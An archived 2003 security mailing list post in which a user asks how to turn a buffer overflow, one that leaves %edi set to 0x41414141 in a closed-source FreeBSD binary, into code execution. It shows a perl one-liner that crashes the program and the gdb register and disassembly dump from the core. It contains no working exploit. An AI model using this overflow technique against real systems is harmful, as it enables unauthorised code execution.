OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
exploiting a binary if %edi can be overwritten?

avelgmx.ch
Date: Mon Jun 23 2003 - 03:06:05 CDT

hi community,

i have a buffer overflow question. If i have a binary (no src available)
that
i can crash with a too long string, so that %edi is set 0x41414141
(means i could control it)... can i craft the buffer so that the adress in
%edi is actually jumped to?

If i put in a malformed addr (like above) the proc segfaults, if i put in a
valid (like addr of my shellcode) it gets executed normally (thats why i
think i have to restore/push/pop %edi to another register somehow... but
how?)

I theory i'd like to do something like restoring the addr i have written to
the place were %edi is to some other register, which would jmp to the
addr given by me. I just dunno, _where_ to write _what_ to accomplish that.
Maybe push %edi and ret in opcodes (but where? infront of my shellcode
won't make much sense, since the prog won't jmp there...)?
...is this exploitable at all?

# ./mybinary `perl -e 'print "A" x 5000'`
Segmentation fault (core dumped)

# gdb -core mybinary.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `mybinary'.
Program terminated with signal 11, Segmentation fault.
#0 0x2813ecfa in ?? ()
(gdb) bt
#0 0x2813ecfa in ?? ()
#1 0x2813dae9 in ?? ()
#2 0x2813de32 in ?? ()
#3 0x2813da25 in ?? ()
#4 0x8049123 in ?? ()
#5 0x8049831 in ?? ()
#6 0x804cd19 in ?? ()
#7 0x804906a in ?? ()
(gdb) i reg
eax 0x0 0
ecx 0xffffffff -1
edx 0x2813ec4c 672394316
ebx 0x2815000c 672464908
esp 0xbfbfdd48 0xbfbfdd48
ebp 0xbfbfdfa0 0xbfbfdfa0
esi 0x8 8
edi 0x41414141 1094795585
eip 0x2813ecfa 0x2813ecfa
eflags 0x3286 12934
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) x/10i $pc
0x2813ecfa: Cannot access memory at address 0x2813ecfa.
(gdb) x/10i $eax
0x0: Cannot access memory at address 0x0.
(gdb) x/10i $ecx
0xffffffff: Cannot access memory at address 0xffffffff.
(gdb) x/10i $ebx
0x2815000c: push %esp
0x2815000d: das
0x2815000e: or %al,(%eax)
0x28150010: add %al,0x34502806(%ebx)
0x28150016: add $0xdcfba28,%eax
0x2815001b: sub %cl,%dl
0x2815001d: iret
0x2815001e: or $0xdcfda28,%eax
0x28150023: sub %ch,%dl
0x28150025: iret
(gdb) x/10i $esp
0xbfbfdd48: or $0x0,%al
0xbfbfdd4a: adc $0x14fe9028,%eax
0xbfbfdd4f: sub %bl,%al
0xbfbfdd51: jecxz 0xbfbfdd12
0xbfbfdd53: mov $0x20202020,%edi
0xbfbfdd58: and %ah,(%eax)
0xbfbfdd5a: and %ah,(%eax)
0xbfbfdd5c: mov %ds,%edi
0xbfbfdd5e: mov $0xbfe6e0bf,%edi
0xbfbfdd63: mov $0x2,%edi
(gdb) x/10i $ebp
0xbfbfdfa0: xor %ah,%ah
0xbfbfdfa2: mov $0x13dae9bf,%edi
0xbfbfdfa7: sub %bl,%al
0xbfbfdfa9: jecxz 0xbfbfdf6a
0xbfbfdfab: mov $0x804f6c0,%edi
0xbfbfdfb0: in $0xe6,%al
0xbfbfdfb2: mov $0x13da89bf,%edi
0xbfbfdfb7: sub %cl,(%eax,%eax,1)
0xbfbfdfba: adc $0xbfe84028,%eax
0xbfbfdfbf: mov $0xbfbfe84c,%edi
(gdb) x/10i $esi
0x8: Cannot access memory at address 0x8.
(gdb) x/10i $edi
0x41414141: Cannot access memory at address 0x41414141.
(gdb) x/10i $eip
0x2813ecfa: Cannot access memory at address 0x2813ecfa.
(gdb)

Thanks for any help with that topic!

avel

--
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!